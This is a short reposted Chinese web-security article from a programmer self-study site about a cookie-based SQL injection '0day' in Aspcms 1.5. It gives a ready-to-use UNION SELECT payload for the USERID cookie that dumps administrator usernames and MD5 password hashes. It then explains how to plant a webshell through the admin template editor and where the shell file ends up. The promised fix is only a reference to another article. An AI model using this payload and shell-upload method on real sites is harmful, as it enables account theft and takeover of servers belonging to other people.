好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

Aspcms 1.5 COOKIES注入0day及修复 - 网站安全 - 自学

 

Aspcms 1.5 COOKIES注入0day,注册一个帐号。然后登陆后修改COOKIES的USERID值

 

在后面加上注入语句:

 

UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins

 

然后编辑帐号就能看到管理员的帐号和 MD5 密码值。

 

后台拿SHELL:HdhCmsTest2cto测试数据

 

访问admin/_Style/AspCms_TemplateEdit. asp ?filename=tmdsb.asp在里面加一句话或者大马。

 

保存后SHELL在风格目录下面。Templates/default/ html /tmdsb.asp

 

摘自 半坑土农民'S Blog

修复:参考本站cookies注入文章

查看更多关于Aspcms 1.5 COOKIES注入0day及修复 - 网站安全 - 自学的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12830
  阅读:47次

上一篇: 腾讯RTX上传任意文件及修复 - 网站安全 - 自学p

下一篇:Con-IMedia SQL注射缺陷及修复 - 网站安全 - 自学ph

相关资讯